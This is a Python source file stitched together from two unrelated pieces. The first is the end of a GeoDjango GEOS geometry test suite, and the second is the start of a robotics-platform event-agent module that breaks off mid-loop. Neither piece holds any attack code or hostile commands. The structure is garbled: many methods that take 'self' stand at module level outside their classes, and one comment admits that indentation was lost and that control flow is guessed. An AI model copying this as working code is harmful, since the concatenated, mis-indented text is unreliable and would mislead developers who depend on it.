            # Area & Centroid
            self.assertAlmostEqual(p.area, poly.area, 9)
            self.assertAlmostEqual(p.centroid[0], poly.centroid.tuple[0], 9)
            self.assertAlmostEqual(p.centroid[1], poly.centroid.tuple[1], 9)
            # Testing the geometry equivalence
            self.assertEqual(True, poly == fromstr(p.wkt))
            self.assertEqual(False, poly == prev) # Should not be equal to previous geometry
            self.assertEqual(True, poly != prev)
            # Testing the exterior ring
            ring = poly.exterior_ring
            self.assertEqual(ring.geom_type, 'LinearRing')
            self.assertEqual(ring.geom_typeid, 2)
            if p.ext_ring_cs:
                self.assertEqual(p.ext_ring_cs, ring.tuple)
                self.assertEqual(p.ext_ring_cs, poly[0].tuple) # Testing __getitem__
            # Testing __getitem__ and __setitem__ on invalid indices
            self.assertRaises(GEOSIndexError, poly.__getitem__, len(poly))
            self.assertRaises(GEOSIndexError, poly.__setitem__, len(poly), False)
            self.assertRaises(GEOSIndexError, poly.__getitem__, -1 * len(poly) - 1)
            # Testing __iter__
            for r in poly:
                self.assertEqual(r.geom_type, 'LinearRing')
                self.assertEqual(r.geom_typeid, 2)
            # Testing polygon construction.
            self.assertRaises(TypeError, Polygon.__init__, 0, [1, 2, 3])
            self.assertRaises(TypeError, Polygon.__init__, 'foo')
            # Polygon(shell, (hole1, ... holeN))
            rings = tuple(r for r in poly)
            self.assertEqual(poly, Polygon(rings[0], rings[1:]))
            # Polygon(shell_tuple, hole_tuple1, ... , hole_tupleN)
            ring_tuples = tuple(r.tuple for r in poly)
            self.assertEqual(poly, Polygon(*ring_tuples))
            # Constructing with tuples of LinearRings.
            self.assertEqual(poly.wkt, Polygon(*tuple(r for r in poly)).wkt)
            self.assertEqual(poly.wkt, Polygon(*tuple(LinearRing(r.tuple) for r in poly)).wkt)
    def test05b_multipolygons(self):
        "Testing MultiPolygon objects."
        # NOTE: GEOS writes notices directly to stderr; the BEGIN/END
        # banners mark that output as expected.
        print "\nBEGIN - expecting GEOS_NOTICE; safe to ignore.\n"
        prev = fromstr('POINT (0 0)')
        for mp in multipolygons:
            mpoly = fromstr(mp.wkt)
            self.assertEqual(mpoly.geom_type, 'MultiPolygon')
            self.assertEqual(mpoly.geom_typeid, 6)
            self.assertEqual(mp.valid, mpoly.valid)
            # Only valid multipolygons have meaningful counts/members.
            if mp.valid:
                self.assertEqual(mp.num_geom, mpoly.num_geom)
                self.assertEqual(mp.n_p, mpoly.num_coords)
                self.assertEqual(mp.num_geom, len(mpoly))
                self.assertRaises(GEOSIndexError, mpoly.__getitem__, len(mpoly))
                for p in mpoly:
                    self.assertEqual(p.geom_type, 'Polygon')
                    self.assertEqual(p.geom_typeid, 3)
                    self.assertEqual(p.valid, True)
                self.assertEqual(mpoly.wkt, MultiPolygon(*tuple(poly.clone() for poly in mpoly)).wkt)
        print "\nEND - expecting GEOS_NOTICE; safe to ignore.\n"
def test06a_memory_hijinks(self):
    "Testing Geometry __del__() on rings and polygons."
    #### Memory issues with rings and polygons
    # These checks keep writable geometries sane: child geometries are
    # handed out as clones, so deleting them (or their parent) must not
    # corrupt anything.
    poly = fromstr(polygons[1].wkt)
    outer = poly[0]
    inner = poly[1]
    # Deleting the pulled-out rings is harmless -- they are clones.
    del outer
    del inner
    outer = poly[0]
    inner = poly[1]
    # Deleting the parent polygon ...
    del poly
    # ... still leaves the (cloned) rings fully usable.
    s1, s2 = str(outer), str(inner)
    # The previous hijinks tests are now moot because only clones are
    # now used =)
def test08_coord_seq(self):
    "Testing Coordinate Sequence objects."
    for p in polygons:
        if p.ext_ring_cs:
            # Constructing the polygon and getting the coordinate sequence
            poly = fromstr(p.wkt)
            cs = poly.exterior_ring.coord_seq
            self.assertEqual(p.ext_ring_cs, cs.tuple)  # done in the Polygon test too.
            self.assertEqual(len(p.ext_ring_cs), len(cs))  # Making sure __len__ works
            # Checks __getitem__ and __setitem__
            for i in xrange(len(p.ext_ring_cs)):
                c1 = p.ext_ring_cs[i]  # Expected value
                c2 = cs[i]  # Value from coordseq
                self.assertEqual(c1, c2)
                # Constructing the test value to set the coordinate sequence with;
                # 2D and 3D fixtures need differently-sized tuples.
                if len(c1) == 2: tset = (5, 23)
                else: tset = (5, 23, 8)
                cs[i] = tset
                # Making sure every set point matches what we expect.
                # (The original redundantly re-assigned `cs[i] = tset` on
                # every pass of this loop; the single assignment above is
                # sufficient and the verification is unchanged.)
                for j in range(len(tset)):
                    self.assertEqual(tset[j], cs[i][j])
def test09_relate_pattern(self):
    "Testing relate() and relate_pattern()."
    g = fromstr('POINT (0 0)')
    self.assertRaises(GEOSException, g.relate_pattern, 0, 'invalid pattern, yo')
    # Each fixture carries: geometry A, geometry B, the DE-9IM pattern
    # and the expected relate_pattern() result.
    for g_tup in relate_geoms:
        a = fromstr(g_tup[0].wkt)
        b = fromstr(g_tup[1].wkt)
        pat, expected = g_tup[2], g_tup[3]
        self.assertEqual(expected, a.relate_pattern(b, pat))
        self.assertEqual(pat, a.relate(b))
def test10_intersection(self):
    "Testing intersects() and intersection()."
    # Walk the topology fixtures in lockstep with their expected intersections.
    for g_tup, expected_tg in zip(topology_geoms, intersect_geoms):
        a = fromstr(g_tup[0].wkt)
        b = fromstr(g_tup[1].wkt)
        expected = fromstr(expected_tg.wkt)
        self.assertEqual(True, a.intersects(b))
        self.assertEqual(expected, a.intersection(b))
        self.assertEqual(expected, a & b)  # __and__ is intersection operator
        a &= b  # testing __iand__
        self.assertEqual(expected, a)
def test11_union(self):
    "Testing union()."
    # Walk the topology fixtures in lockstep with their expected unions.
    for g_tup, expected_tg in zip(topology_geoms, union_geoms):
        a = fromstr(g_tup[0].wkt)
        b = fromstr(g_tup[1].wkt)
        expected = fromstr(expected_tg.wkt)
        self.assertEqual(expected, a.union(b))
        self.assertEqual(expected, a | b)  # __or__ is union operator
        a |= b  # testing __ior__
        self.assertEqual(expected, a)
def test12_difference(self):
    "Testing difference()."
    # Walk the topology fixtures in lockstep with their expected differences.
    for g_tup, expected_tg in zip(topology_geoms, diff_geoms):
        a = fromstr(g_tup[0].wkt)
        b = fromstr(g_tup[1].wkt)
        expected = fromstr(expected_tg.wkt)
        self.assertEqual(expected, a.difference(b))
        self.assertEqual(expected, a - b)  # __sub__ is difference operator
        a -= b  # testing __isub__
        self.assertEqual(expected, a)
def test13_symdifference(self):
    "Testing sym_difference()."
    # Walk the topology fixtures in lockstep with their expected symmetric differences.
    for g_tup, expected_tg in zip(topology_geoms, sdiff_geoms):
        a = fromstr(g_tup[0].wkt)
        b = fromstr(g_tup[1].wkt)
        expected = fromstr(expected_tg.wkt)
        self.assertEqual(expected, a.sym_difference(b))
        self.assertEqual(expected, a ^ b)  # __xor__ is symmetric difference operator
        a ^= b  # testing __ixor__
        self.assertEqual(expected, a)
def test14_buffer(self):
    "Testing buffer()."
    # Each fixture carries: source geometry, expected buffer, width, quadsegs.
    for g_tup in buffer_geoms:
        g = fromstr(g_tup[0].wkt)
        exp_buf = fromstr(g_tup[1].wkt)  # the buffer we expect
        width, quadsegs = g_tup[2], g_tup[3]
        # Can't use a floating-point for the number of quadsegs.
        self.assertRaises(ctypes.ArgumentError, g.buffer, width, float(quadsegs))
        # Constructing our buffer
        buf = g.buffer(width, quadsegs)
        self.assertEqual(exp_buf.num_coords, buf.num_coords)
        self.assertEqual(len(exp_buf), len(buf))
        # Each ring of the computed buffer must match the expected ring,
        # point by point, to 9 places (floating-point imprecision rules
        # out exact comparison).
        for exp_ring, buf_ring in zip(exp_buf, buf):
            self.assertEqual(len(exp_ring), len(buf_ring))
            for k in xrange(len(exp_ring)):
                self.assertAlmostEqual(exp_ring[k][0], buf_ring[k][0], 9)
                self.assertAlmostEqual(exp_ring[k][1], buf_ring[k][1], 9)
def test15_srid(self):
    "Testing the SRID property and keyword."
    # Testing SRID keyword on Point
    pnt = Point(5, 23, srid=4326)
    self.assertEqual(4326, pnt.srid)
    pnt.srid = 3084
    self.assertEqual(3084, pnt.srid)
    self.assertRaises(ctypes.ArgumentError, pnt.set_srid, '4326')
    # Testing SRID keyword on fromstr(), and on Polygon rings.
    poly = fromstr(polygons[1].wkt, srid=4269)
    self.assertEqual(4269, poly.srid)
    for ring in poly: self.assertEqual(4269, ring.srid)
    poly.srid = 4326
    self.assertEqual(4326, poly.shell.srid)
    # Testing SRID keyword on GeometryCollection
    gc = GeometryCollection(Point(5, 23), LineString((0, 0), (1.5, 1.5), (3, 3)), srid=32021)
    self.assertEqual(32021, gc.srid)
    for i in range(len(gc)): self.assertEqual(32021, gc[i].srid)
    # GEOS may get the SRID from HEXEWKB
    # 'POINT(5 23)' at SRID=4326 in hex form -- obtained from PostGIS
    # using `SELECT GeomFromText('POINT (5 23)', 4326);`.
    # (Renamed local from `hex` to `hexewkb` to stop shadowing the builtin.)
    hexewkb = '0101000020E610000000000000000014400000000000003740'
    p1 = fromstr(hexewkb)
    self.assertEqual(4326, p1.srid)
    # In GEOS 3.0.0rc1-4 when the EWKB and/or HEXEWKB is exported,
    # the SRID information is lost and set to -1 -- this is not a
    # problem on the 3.0.0 version (another reason to upgrade).
    exp_srid = self.null_srid
    p2 = fromstr(p1.hex)
    self.assertEqual(exp_srid, p2.srid)
    p3 = fromstr(p1.hex, srid=-1)  # -1 is intended.
    self.assertEqual(-1, p3.srid)
def test16_mutable_geometries(self):
    "Testing the mutability of Polygons and Geometry Collections."
    ### Testing the mutability of Polygons ###
    for p in polygons:
        poly = fromstr(p.wkt)
        # Should only be able to use __setitem__ with LinearRing geometries.
        self.assertRaises(TypeError, poly.__setitem__, 0, LineString((1, 1), (2, 2)))
        # Constructing the new shell by adding 500 to every point in the old shell.
        shell_tup = poly.shell.tuple
        new_coords = []
        for point in shell_tup: new_coords.append((point[0] + 500., point[1] + 500.))
        new_shell = LinearRing(*tuple(new_coords))
        # Assigning polygon's exterior ring w/the new shell
        poly.exterior_ring = new_shell
        s = str(new_shell)  # new shell is still accessible
        self.assertEqual(poly.exterior_ring, new_shell)
        self.assertEqual(poly[0], new_shell)
    ### Testing the mutability of Geometry Collections
    for tg in multipoints:
        mp = fromstr(tg.wkt)
        for i in range(len(mp)):
            # Creating a random point.
            pnt = mp[i]
            new = Point(random.randint(1, 100), random.randint(1, 100))
            # Testing the assignment
            mp[i] = new
            s = str(new)  # what was used for the assignment is still accessible
            self.assertEqual(mp[i], new)
            self.assertEqual(mp[i].wkt, new.wkt)
            self.assertNotEqual(pnt, mp[i])
    # MultiPolygons involve much more memory management because each
    # Polygon w/in the collection has its own rings.
    for tg in multipolygons:
        mpoly = fromstr(tg.wkt)
        for i in xrange(len(mpoly)):
            poly = mpoly[i]
            old_poly = mpoly[i]
            # Offsetting the each ring in the polygon by 500.
            for j in xrange(len(poly)):
                r = poly[j]
                for k in xrange(len(r)): r[k] = (r[k][0] + 500., r[k][1] + 500.)
                poly[j] = r
            # `poly` is a clone, so mutating it must not have touched the parent yet.
            self.assertNotEqual(mpoly[i], poly)
            # Testing the assignment
            mpoly[i] = poly
            s = str(poly)  # Still accessible
            self.assertEqual(mpoly[i], poly)
            self.assertNotEqual(mpoly[i], old_poly)
    # Extreme (!!) __setitem__ -- no longer works, have to detect
    # in the first object that __setitem__ is called in the subsequent
    # objects -- maybe mpoly[0, 0, 0] = (3.14, 2.71)?
    #mpoly[0][0][0] = (3.14, 2.71)
    #self.assertEqual((3.14, 2.71), mpoly[0][0][0])
    # Doing it more slowly..
    #self.assertEqual((3.14, 2.71), mpoly[0].shell[0])
    #del mpoly
def test17_threed(self):
    "Testing three-dimensional geometries."
    # A 3D Point: coords round-trip, and 2D reassignment is rejected.
    pt = Point(2, 3, 8)
    self.assertEqual((2., 3., 8.), pt.coords)
    self.assertRaises(TypeError, pt.set_coords, (1., 2.))
    pt.coords = (1., 2., 3.)
    self.assertEqual((1., 2., 3.), pt.coords)
    # A 3D LineString: the same checks via __setitem__.
    line = LineString((2., 3., 8.), (50., 250., -117.))
    self.assertEqual(((2., 3., 8.), (50., 250., -117.)), line.tuple)
    self.assertRaises(TypeError, line.__setitem__, 0, (1., 2.))
    line[0] = (1., 2., 3.)
    self.assertEqual((1., 2., 3.), line[0])
def test18_distance(self):
    "Testing the distance() function."
    origin = Point(0, 0)
    # Distance to itself is zero.
    self.assertEqual(0.0, origin.distance(Point(0, 0)))
    # One unit straight up.
    self.assertEqual(1.0, origin.distance(Point(0, 1)))
    # Diagonal distance is ~ sqrt(2).
    self.assertAlmostEqual(1.41421356237, origin.distance(Point(1, 1)), 11)
    # Distances are from the closest vertex in each geometry --
    # should be 3 (distance from (2, 2) to (5, 2)).
    line_a = LineString((0, 0), (1, 1), (2, 2))
    line_b = LineString((5, 2), (6, 1), (7, 0))
    self.assertEqual(3, line_a.distance(line_b))
def test19_length(self):
    "Testing the length property."
    # A point has zero length.
    self.assertEqual(0.0, Point(0, 0).length)
    # A unit diagonal is ~ sqrt(2) long.
    self.assertAlmostEqual(1.41421356237, LineString((0, 0), (1, 1)).length, 11)
    # A polygon's length is the circumference of its shell.
    square = Polygon(LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
    self.assertEqual(4.0, square.length)
    # A collection's length is the sum of its members' lengths.
    pair = MultiPolygon(square.clone(), square)
    self.assertEqual(8.0, pair.length)
def test20a_emptyCollections(self):
    "Testing empty geometries and collections."
    gc1 = GeometryCollection([])
    gc2 = fromstr('GEOMETRYCOLLECTION EMPTY')
    pnt = fromstr('POINT EMPTY')
    ls = fromstr('LINESTRING EMPTY')
    poly = fromstr('POLYGON EMPTY')
    mls = fromstr('MULTILINESTRING EMPTY')
    mpoly1 = fromstr('MULTIPOLYGON EMPTY')
    mpoly2 = MultiPolygon(())
    for g in [gc1, gc2, pnt, ls, poly, mls, mpoly1, mpoly2]:
        self.assertEqual(True, g.empty)
        # Testing len() and num_geom.
        if isinstance(g, Polygon):
            self.assertEqual(1, len(g))  # Has one empty linear ring
            self.assertEqual(1, g.num_geom)
            self.assertEqual(0, len(g[0]))
        elif isinstance(g, (Point, LineString)):
            self.assertEqual(1, g.num_geom)
            self.assertEqual(0, len(g))
        else:
            # Empty collections report no members at all.
            self.assertEqual(0, g.num_geom)
            self.assertEqual(0, len(g))
        # Testing __getitem__ (doesn't work on Point or Polygon)
        if isinstance(g, Point):
            self.assertRaises(GEOSIndexError, g.get_x)
        elif isinstance(g, Polygon):
            # The empty polygon still carries an (empty) exterior ring.
            lr = g.shell
            self.assertEqual('LINEARRING EMPTY', lr.wkt)
            self.assertEqual(0, len(lr))
            self.assertEqual(True, lr.empty)
            self.assertRaises(GEOSIndexError, lr.__getitem__, 0)
        else:
            self.assertRaises(GEOSIndexError, g.__getitem__, 0)
def test20b_collections_of_collections(self):
    "Testing GeometryCollection handling of other collections."
    # Compose a GEOMETRYCOLLECTION WKT string out of the other test
    # collections and polygons.
    coll = [mp.wkt for mp in multipolygons if mp.valid] \
        + [mls.wkt for mls in multilinestrings] \
        + [p.wkt for p in polygons] \
        + [mp.wkt for mp in multipoints]
    gc_wkt = 'GEOMETRYCOLLECTION(%s)' % ','.join(coll)
    # Constructable from the WKT string ...
    gc1 = GEOSGeometry(gc_wkt)
    # ... and from the individual geometry arguments ...
    gc2 = GeometryCollection(*tuple(g for g in gc1))
    # ... with equal results.
    self.assertEqual(gc1, gc2)
def test21_test_gdal(self):
    "Testing `ogr` and `srs` properties."
    if not gdal.HAS_GDAL: return
    # Without an SRID the OGR counterpart exists but no spatial reference.
    pt_geom = fromstr('POINT(5 23)')
    self.assertEqual(True, isinstance(pt_geom.ogr, gdal.OGRGeometry))
    self.assertEqual(pt_geom.srs, None)
    # With an SRID both the OGR geometry and the SRS are available.
    ls_geom = fromstr('LINESTRING(0 0, 5 5, 23 23)', srid=4326)
    self.assertEqual(True, isinstance(ls_geom.ogr, gdal.OGRGeometry))
    self.assertEqual(True, isinstance(ls_geom.srs, gdal.SpatialReference))
    self.assertEqual(ls_geom.hex, ls_geom.ogr.hex)
    self.assertEqual('WGS 84', ls_geom.srs.name)
def test22_copy(self):
    "Testing use with the Python `copy` module."
    import django.utils.copycompat as copy
    poly = GEOSGeometry('POLYGON((0 0, 0 23, 23 23, 23 0, 0 0), (5 5, 5 10, 10 10, 10 5, 5 5))')
    shallow, deep = copy.copy(poly), copy.deepcopy(poly)
    # Both kinds of copy must wrap their own GEOS pointer.
    self.assertNotEqual(poly._ptr, shallow._ptr)
    self.assertNotEqual(poly._ptr, deep._ptr)
def test23_transform(self):
    "Testing `transform` method."
    if not gdal.HAS_GDAL: return
    orig = GEOSGeometry('POINT (-104.609 38.255)', 4326)
    trans = GEOSGeometry('POINT (992385.4472045 481455.4944650)', 2774)
    # Transform three clones: by SRID, by SpatialReference object and
    # by CoordTransform object.
    by_srid, by_srs, by_ct = orig.clone(), orig.clone(), orig.clone()
    by_srid.transform(trans.srid)
    by_srs.transform(gdal.SpatialReference('EPSG:2774'))
    ct = gdal.CoordTransform(gdal.SpatialReference('WGS84'), gdal.SpatialReference(2774))
    by_ct.transform(ct)
    # The `clone` keyword must leave the source geometry untouched.
    k1 = orig.clone()
    k2 = k1.transform(trans.srid, clone=True)
    self.assertEqual(k1, orig)
    self.assertNotEqual(k1, k2)
    # All transformed points should land on `trans` to ~3 places.
    prec = 3
    for p in (by_srid, by_srs, by_ct, k2):
        self.assertAlmostEqual(trans.x, p.x, prec)
        self.assertAlmostEqual(trans.y, p.y, prec)
def test24_extent(self):
    "Testing `extent` method."
    # A MultiPoint's extent is (xmin, ymin, xmax, ymax).
    mp = MultiPoint(Point(5, 23), Point(0, 0), Point(10, 50))
    self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
    # A Point's extent is just the point's coordinates, repeated.
    pnt = Point(5.23, 17.8)
    self.assertEqual((5.23, 17.8, 5.23, 17.8), pnt.extent)
    # A 'real world' Polygon: the extent must match the min/max of the
    # shell's coordinate arrays.
    poly = fromstr(polygons[3].wkt)
    shell = poly.shell
    xs, ys = shell.x, shell.y
    self.assertEqual((min(xs), min(ys), max(xs), max(ys)), poly.extent)
def test25_pickle(self):
    "Testing pickling and unpickling support."
    # Exercise both the pure-Python and the C pickle implementations.
    import pickle, cPickle
    # Build the test geometries, giving some groups an SRID.
    tgeoms = [GEOSGeometry(tg.wkt, None) for tg in points]
    tgeoms += [GEOSGeometry(tg.wkt, 4326) for tg in multilinestrings]
    tgeoms += [GEOSGeometry(tg.wkt, 3084) for tg in polygons]
    tgeoms += [GEOSGeometry(tg.wkt, 900913) for tg in multipolygons]
    # The SRID won't be exported in GEOS 3.0 release candidates.
    no_srid = self.null_srid == -1
    for geom in tgeoms:
        for dumps, loads in ((cPickle.dumps, cPickle.loads), (pickle.dumps, pickle.loads)):
            restored = loads(dumps(geom))
            self.assertEqual(geom, restored)
            if not no_srid: self.assertEqual(geom.srid, restored.srid)
def test26_prepared(self):
    "Testing PreparedGeometry support."
    if not GEOS_PREPARE: return
    # A simple multipolygon and its prepared counterpart.
    mpoly = GEOSGeometry('MULTIPOLYGON(((0 0,0 5,5 5,5 0,0 0)),((5 5,5 10,10 10,10 5,5 5)))')
    prep = mpoly.prepared
    # Test points paired with the expected `covers` result (regular GEOS
    # geometries have no `covers` operation).
    cases = ((Point(5, 5), True), (Point(7.5, 7.5), True), (Point(2.5, 7.5), False))
    for pnt, c in cases:
        # The prepared geometry must agree with the plain one (just faster).
        self.assertEqual(mpoly.contains(pnt), prep.contains(pnt))
        self.assertEqual(mpoly.intersects(pnt), prep.intersects(pnt))
        self.assertEqual(c, prep.covers(pnt))
def test26_line_merge(self):
    "Testing line merge support"
    # Pairs of (input geometry, expected merged result).
    cases = (
        (fromstr('LINESTRING(1 1, 1 1, 3 3)'),
         fromstr('LINESTRING(1 1, 3 3)')),
        (fromstr('MULTILINESTRING((1 1, 3 3), (3 3, 4 2))'),
         fromstr('LINESTRING (1 1, 3 3, 4 2)')),
    )
    for geom, expected in cases:
        self.assertEqual(expected, geom.merged)
def suite():
    """Build a TestSuite holding every GEOSTest case."""
    tests = unittest.TestSuite()
    tests.addTest(unittest.makeSuite(GEOSTest))
    return tests
def run(verbosity=2):
    """Run the GEOS test suite with the given unittest verbosity."""
    runner = unittest.TextTestRunner(verbosity=verbosity)
    runner.run(suite())
| |
__author__ = "Fabio Giuseppe Di Benedetto"
from rcmp_node import logging, RCMP_LOGGER_NAME, threading, RCMPlatformNode
from rcmp_inter_communication import RCMPInterCommunicationClient, RCMPMessage
# Event type codes exchanged between RCM platform nodes (used as the
# RCMPEventHandler.EVENT_KEY value in event dictionaries).
PAIRING_EVENT = 'PGE'  # a node was selected as server for an R-type node
UPDATE_EVENT = 'UE'  # tell the master that two nodes have been coupled
PAIRED_EVENT = 'PDE'  # master acknowledges and has persisted the pairing
ROLLBACK_UPDATE_EVENT = 'RUE'  # tell the master that two nodes were uncoupled
ROLLBACK_UPDATE_ALL_EVENT = 'RUAE'  # tell the master that all nodes were uncoupled
# CLEAN_UP_EVENT = 'CUE'
STOP_WD_EVENT = 'SWE'  # stop a single watchdog
STOP_ALL_WD_EVENT = 'SAWE'  # stop every watchdog
class RCMPEventAgent:
    """The generic agent that execute the event."""
    # Keys used in the event parameter dictionary to address the target
    # platform node instance.
    I_ADDRESS_KEY = "i_address"
    I_NAME_KEY = "i_name"

    def __init__(self, pni):
        # pni: the local RCM platform node instance data, indexed with
        # RCMPlatformNode.PNI_* keys (address, name, master flag, ...).
        self._logger = logging.getLogger(RCMP_LOGGER_NAME)
        # this is for generic return messages
        self._who = ""
        self.pni = pni

    # def call(self, params):
    #     """Call the internal server to notify an event to the RCM platform node instance specified in the request.
    #     Return True if the event reach the target."""
    #     c = RCMPInterCommunicationClient(address=self.pni[RCMPlatformNode.PNI_ADDRESS])
    #     try:
    #         c.connect()
    #         req = RCMPMessage(params)
    #         c.send(req.get_txt())
    #         res = c.receive()
    #         if res:
    #             result = RCMPMessage()
    #             result.set_content(res)
    #             return result.is_ok()
    #         else:
    #             self._logger.error("%s received no response" % req.get_txt())
    #     finally:
    #         c.close()
    #     # if we arrive here the call failed
    #     return False

    def notify(self, params):
        """Notify an event to the RCM platform node instance specified in the request. Return an RCMPMessage."""
        result = RCMPMessage()
        self._logger.debug("event notify with params: %s" % params)
        # the events are asynchronous so we don't need a timeout to wait the response
        c = RCMPInterCommunicationClient(params[self.I_ADDRESS_KEY], t_out=2.0)
        try:
            c.connect()
            # propagate the request as it is
            c.send(RCMPMessage(params).get_txt())
            # take the result of the operation
            # res = c.receive()
            res = c.receive_all_so_far()
            if res:
                result.set_content(res)
            else:
                reason = "No response received"
                result.create_error_response(reason)
        except Exception as e:
            # any communication failure is folded into an error response
            # rather than propagated to the caller
            reason = "Error notifying the event to the RCM platform node at %s: %s" % (params[self.I_ADDRESS_KEY], e)
            self._logger.error(reason)
            result.create_error_response(reason)
        finally:
            try:
                c.close()
            except Exception as e:
                # this exception doesn't change the result but we want to trace in the log
                self._logger.warning("Error closing the notifying client: %s" % e)
        return result

    def execute(self, operation=None, params=None):
        """Execute the required operation with the parameters passed. Return an RCMPMessage."""
        result = RCMPMessage()
        if operation:
            if params and self.I_ADDRESS_KEY in params and params[self.I_ADDRESS_KEY] and \
                    params[self.I_ADDRESS_KEY] != self.pni[RCMPlatformNode.PNI_ADDRESS]:
                # perform the delegation to another platform node because the target
                # is not the current one
                result = self.notify(params)
            else:
                # perform the operation (the target is the current platform node)
                result = operation(params)
        return result
class PNodeInstance(RCMPEventAgent):
    # Parameter keys for the platform node instances involved in an event:
    # PI_* identify a generic peer, PI_S_* the server (S-type) side and
    # PI_R_* the robot (R-type) side of a pairing.
    PI_NAME_KEY = "pi_name"
    PI_ADDRESS_KEY = "pi_address"
    PI_S_NAME_KEY = "pi_s_name"
    PI_S_ADDRESS_KEY = "pi_s_address"
    PI_R_NAME_KEY = "pi_r_name"
    PI_R_ADDRESS_KEY = "pi_r_address"
    PI_REACHABLE_KEY = "pi_reachable"
    PI_SOURCE_ADDRESS_KEY = "pi_source_address"

    def __init__(self, pni, wdm, msm):
        """Event agent for platform node instance events.

        pni -- local platform node instance data (see RCMPEventAgent)
        wdm -- watchdog manager, used to start/stop peer watchdogs
        msm -- manager forwarded to ServiceSpace/ServiceNode/ServiceLauncher;
               presumably the managed-service manager -- TODO confirm
        """
        RCMPEventAgent.__init__(self, pni)
        self._who = "platform node instance"
        self.wdm = wdm
        self.msm = msm
def pairing(self, params):
    """Notify a platform node that it has been selected as server for a
    platform node of R type. Requires params["pi_r_name"] and
    params["pi_r_address"]. Returns an RCMPMessage."""
    return self.execute(operation=self.target_on_pairing, params=params)
def update(self, params):
    """Notify the platform node master that two platform nodes have been
    coupled. Requires params["pi_s_name"], params["pi_s_address"],
    params["pi_r_name"] and params["pi_r_address"]. Returns an RCMPMessage."""
    return self.execute(operation=self.target_on_update, params=params)
def paired(self, params):
    """Notify the paired platform nodes that the master knows about, and
    has saved, their connection. Requires params["pi_name"] and
    params["pi_address"]. Returns an RCMPMessage."""
    return self.execute(operation=self.target_on_paired, params=params)
def rollback_update(self, params):
    """Notify the platform node master that two platform nodes have been
    uncoupled. Requires params["pi_s_name"], params["pi_s_address"],
    params["pi_r_name"], params["pi_r_address"] and params["pi_reachable"].
    Returns an RCMPMessage."""
    return self.execute(operation=self.target_on_rollback_update, params=params)
def rollback_update_all(self, params):
    """Notify the platform node master that all platform nodes have been
    uncoupled. Returns an RCMPMessage."""
    return self.execute(operation=self.target_on_rollback_update_all, params=params)
def stop_wd(self, params):
    """Stop a single watchdog. Requires params["pi_name"].
    Returns an RCMPMessage."""
    return self.execute(operation=self.target_on_stop_wd, params=params)
def stop_all_wd(self, params):
    """Stop every watchdog. Returns an RCMPMessage."""
    return self.execute(operation=self.target_on_stop_all_wd, params=params)
# --- PAIRING ---
def target_on_pairing(self, params):
    """Local handler for a pairing event: the R-type peer picked this node
    as its server, so tell the master via an update event, then ack."""
    self.throw_update_event(params)
    ack = RCMPMessage()
    ack.create_ok_response("Pairing ack")
    return ack
def throw_update_event(self, params):
    """Asynchronously send an UPDATE event toward the master node."""
    # The event is addressed to the master unless this node is the master itself.
    if self.pni[RCMPlatformNode.PNI_IS_MASTER]:
        target_address = self.pni[RCMPlatformNode.PNI_ADDRESS]
    else:
        target_address = self.pni[RCMPlatformNode.PNI_MASTER_NODE_IP]
    event = {RCMPEventHandler.EVENT_KEY: UPDATE_EVENT,
             self.I_ADDRESS_KEY: target_address,
             self.PI_S_NAME_KEY: self.pni[RCMPlatformNode.PNI_NAME],
             self.PI_S_ADDRESS_KEY: self.pni[RCMPlatformNode.PNI_ADDRESS],
             self.PI_R_NAME_KEY: params[self.PI_R_NAME_KEY],
             self.PI_R_ADDRESS_KEY: params[self.PI_R_ADDRESS_KEY]}
    self._logger.info("Throwing update event = %s" % event)
    threading.Thread(target=self.update, args=(event, )).start()
# --- UPDATE ---
def target_on_update(self, params):
    """Master-side handler for an update event: the two peers agreed on the
    pairing, so finalize it (persist the connection, start the service
    logic) in a background thread and acknowledge immediately."""
    threading.Thread(target=self.execute_update, args=(params, )).start()
    ack = RCMPMessage()
    ack.create_ok_response("Update ack")
    return ack
def execute_update(self, params):
    # Runs on the master in a background thread: start the service logic
    # for the new pairing, persist the connection, then notify both peers.
    from rcmp_robotics_data import execute_int_robotics_data_query
    if self.start_service_logic(params):
        # if the service logic launch went well we have to save this binding
        execute_int_robotics_data_query(self.create_conn, params,
                                        "Unable to update the connection between %s and %s" %
                                        (params[self.PI_S_NAME_KEY], params[self.PI_R_NAME_KEY]))
        # now the master know about the connection between the two ends of the pair and has to throw
        # a paired event to both
        # NOTE(review): indentation was lost in this copy; the paired event
        # is assumed to fire only on success -- confirm against the original.
        self.throw_paired_event(params)
def start_service_logic(self, params):
    """Start the service logic bound to the R-type node of the new pairing:
    create its service space, then launch every configured service item
    (node or launcher). On any failure, roll back everything started so
    far. Returns True on full success, False otherwise."""
    # TODO this operation must be atomic: check if the solution is ok
    from rcmp_robotics_data import execute_int_robotics_data_query
    result = True
    ss_pi_type_target = execute_int_robotics_data_query(self.get_sl_ss_pi_type_target, params,
                                                        "Unable to get the service space target from "
                                                        "service logic of '%s'" % params[self.PI_R_NAME_KEY])
    if ss_pi_type_target:
        # ssl_flow records each successfully executed command so it can be
        # undone in reverse order on failure.
        ssl_flow = []
        self._logger.debug("-- TMP -- Update has to create the service space on %s" % ss_pi_type_target)
        from rcmp_command import CREATE_SERVICE_SPACE, DELETE_SERVICE_SPACE, \
            START_SERVICE_NODE, KILL_SERVICE_NODE, START_SERVICE_LAUNCHER, KILL_SERVICE_LAUNCHER, \
            RCMPCommandHandler
        from rcmp_service_command import ServiceSpace, ServiceNode, ServiceLauncher
        s_space = ServiceSpace(self.pni, self.msm)
        s_node = ServiceNode(self.pni, self.msm)
        s_launcher = ServiceLauncher(self.pni, self.msm)
        # the update starts the service logic associated with the platform
        # node instance of type R at manual provisioning time
        cmd = {RCMPCommandHandler.COMMAND_KEY: CREATE_SERVICE_SPACE,
               ServiceSpace.I_NAME_KEY: params[self.PI_S_NAME_KEY] if ss_pi_type_target == RCMPlatformNode.S_TYPE
               else params[self.PI_R_NAME_KEY], ServiceSpace.SS_NAME_KEY: params[self.PI_R_NAME_KEY]}
        res = s_space.create(cmd)
        result = res.is_ok()
        if result:
            # the service space creation went well so we can add it in ssl_flow
            ssl_flow.append(cmd)
            # once started the service space associated with the service logic
            # we have to start all the remaining items of the service logic (nodes
            # and launchers)
            sl_items = execute_int_robotics_data_query(self.get_sl_sli, params,
                                                       "Unable to get the service logic items from "
                                                       "service logic of '%s'" % params[self.PI_R_NAME_KEY])
            if sl_items:
                for sli in sl_items:
                    if sli[0] and sli[1] and sli[2] and sli[3]:
                        # all this parameters are mandatory
